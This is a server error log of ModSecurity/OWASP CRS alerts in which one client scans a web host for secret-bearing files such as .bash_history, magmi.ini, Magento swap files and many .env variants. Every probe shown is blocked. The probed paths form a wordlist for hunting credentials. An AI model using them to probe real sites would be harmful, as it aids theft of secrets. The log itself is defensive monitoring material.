[Tue May 27 15:02:39.472813 2025] [:error] [pid 3435315] [client 185.146.232.218:30148] [client 185.146.232.218] ModSecurity: Warning. Matched phrase ".bash_history" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .bash_history found within REQUEST_FILENAME: /.bash_history"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.bash_history"] [unique_id "aDW374MZxRfo8GmAcSTjVAAAAA4"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:02:39.473154 2025] [:error] [pid 3435315] [client 185.146.232.218:30148] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.bash_history"] [unique_id "aDW374MZxRfo8GmAcSTjVAAAAA4"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:02:39.473724 2025] [:error] [pid 3435315] [client 185.146.232.218:30148] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.bash_history"] [unique_id "aDW374MZxRfo8GmAcSTjVAAAAA4"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:02:44.837454 2025] [:error] [pid 3435311] [client 185.146.232.218:30160] [client 185.146.232.218] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/importProducts/conf/magmi.ini"] [unique_id "aDW39McVU5YaHAERsMJjXQAAAAs"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:02:44.838033 2025] [:error] [pid 3435311] [client 185.146.232.218:30160] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/importProducts/conf/magmi.ini"] [unique_id "aDW39McVU5YaHAERsMJjXQAAAAs"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:02:44.838267 2025] [:error] [pid 3435311] [client 185.146.232.218:30160] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/importProducts/conf/magmi.ini"] [unique_id "aDW39McVU5YaHAERsMJjXQAAAAs"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:02:50.087580 2025] [:error] [pid 3435313] [client 185.146.232.218:41302] [client 185.146.232.218] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/import/conf/magmi.ini"] [unique_id "aDW3-hc-bm3P_kMSA92eHAAAAA0"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:02:50.088144 2025] [:error] [pid 3435313] [client 185.146.232.218:41302] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/import/conf/magmi.ini"] [unique_id "aDW3-hc-bm3P_kMSA92eHAAAAA0"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:02:50.088348 2025] [:error] [pid 3435313] [client 185.146.232.218:41302] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/import/conf/magmi.ini"] [unique_id "aDW3-hc-bm3P_kMSA92eHAAAAA0"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:02:57.344383 2025] [:error] [pid 3435316] [client 185.146.232.218:41312] [client 185.146.232.218] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/conf/magmi.ini"] [unique_id "aDW4ASw1TIthxW7dZehD4wAAAA8"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:02:57.344926 2025] [:error] [pid 3435316] [client 185.146.232.218:41312] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/conf/magmi.ini"] [unique_id "aDW4ASw1TIthxW7dZehD4wAAAA8"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:02:57.345110 2025] [:error] [pid 3435316] [client 185.146.232.218:41312] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/conf/magmi.ini"] [unique_id "aDW4ASw1TIthxW7dZehD4wAAAA8"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:03:05.310473 2025] [:error] [pid 3435308] [client 185.146.232.218:10170] [client 185.146.232.218] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/magmi/conf/magmi.ini"] [unique_id "aDW4CRpsgQ-cVRubiE_pHwAAAAg"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:03:05.311012 2025] [:error] [pid 3435308] [client 185.146.232.218:10170] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/magmi/conf/magmi.ini"] [unique_id "aDW4CRpsgQ-cVRubiE_pHwAAAAg"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:03:05.311207 2025] [:error] [pid 3435308] [client 185.146.232.218:10170] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/magmi/conf/magmi.ini"] [unique_id "aDW4CRpsgQ-cVRubiE_pHwAAAAg"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:03:07.649859 2025] [:error] [pid 3434643] [client 185.146.232.218:10178] [client 185.146.232.218] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/magmi.ini"] [unique_id "aDW4Czcx-eYxvKPm3wqRFgAAAAE"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:03:07.650436 2025] [:error] [pid 3434643] [client 185.146.232.218:10178] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/magmi.ini"] [unique_id "aDW4Czcx-eYxvKPm3wqRFgAAAAE"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:03:07.650598 2025] [:error] [pid 3434643] [client 185.146.232.218:10178] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/magmi.ini"] [unique_id "aDW4Czcx-eYxvKPm3wqRFgAAAAE"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:03:17.099038 2025] [authz_core:error] [pid 3435317] [client 185.146.232.218:23526] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/.local.xml.swp, referer: https://economiasolidale.38121.it/
[Tue May 27 15:03:23.145718 2025] [authz_core:error] [pid 3434642] [client 185.146.232.218:35764] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/.env.php.swp, referer: https://economiasolidale.38121.it/
[Tue May 27 15:03:49.755834 2025] [:error] [pid 3435308] [client 185.146.232.218:60006] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env_"] [unique_id "aDW4NRpsgQ-cVRubiE_pIAAAAAg"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:03:49.756198 2025] [:error] [pid 3435308] [client 185.146.232.218:60006] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env_"] [unique_id "aDW4NRpsgQ-cVRubiE_pIAAAAAg"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:03:49.756416 2025] [:error] [pid 3435308] [client 185.146.232.218:60006] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env_"] [unique_id "aDW4NRpsgQ-cVRubiE_pIAAAAAg"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:04:05.509726 2025] [:error] [pid 3434643] [client 185.146.232.218:38268] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env1"] [unique_id "aDW4RTcx-eYxvKPm3wqRFwAAAAE"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:04:05.510069 2025] [:error] [pid 3434643] [client 185.146.232.218:38268] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env1"] [unique_id "aDW4RTcx-eYxvKPm3wqRFwAAAAE"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:04:05.510273 2025] [:error] [pid 3434643] [client 185.146.232.218:38268] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env1"] [unique_id "aDW4RTcx-eYxvKPm3wqRFwAAAAE"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:04:16.087939 2025] [:error] [pid 3435307] [client 185.146.232.218:46490] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env2"] [unique_id "aDW4UP8iIWre8jY-cNxR1QAAAAc"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:04:16.088281 2025] [:error] [pid 3435307] [client 185.146.232.218:46490] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env2"] [unique_id "aDW4UP8iIWre8jY-cNxR1QAAAAc"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:04:16.088441 2025] [:error] [pid 3435307] [client 185.146.232.218:46490] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env2"] [unique_id "aDW4UP8iIWre8jY-cNxR1QAAAAc"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:04:29.868611 2025] [:error] [pid 3434642] [client 185.146.232.218:2616] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.docker"] [unique_id "aDW4XfoteRZm3UET_KXSsgAAAAA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:04:29.868931 2025] [:error] [pid 3434642] [client 185.146.232.218:2616] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.docker"] [unique_id "aDW4XfoteRZm3UET_KXSsgAAAAA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:04:29.869148 2025] [:error] [pid 3434642] [client 185.146.232.218:2616] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.docker"] [unique_id "aDW4XfoteRZm3UET_KXSsgAAAAA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:04:40.029896 2025] [:error] [pid 3435311] [client 185.146.232.218:2572] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aDW4aMcVU5YaHAERsMJjXwAAAAs"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:04:40.030223 2025] [:error] [pid 3435311] [client 185.146.232.218:2572] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aDW4aMcVU5YaHAERsMJjXwAAAAs"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:04:40.030462 2025] [:error] [pid 3435311] [client 185.146.232.218:2572] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aDW4aMcVU5YaHAERsMJjXwAAAAs"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:04:40.208644 2025] [:error] [pid 3435315] [client 185.146.232.218:2576] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aDW4aIMZxRfo8GmAcSTjVgAAAA4"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:04:40.208994 2025] [:error] [pid 3435315] [client 185.146.232.218:2576] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aDW4aIMZxRfo8GmAcSTjVgAAAA4"], referer: https://economiasolidale.38121.it/
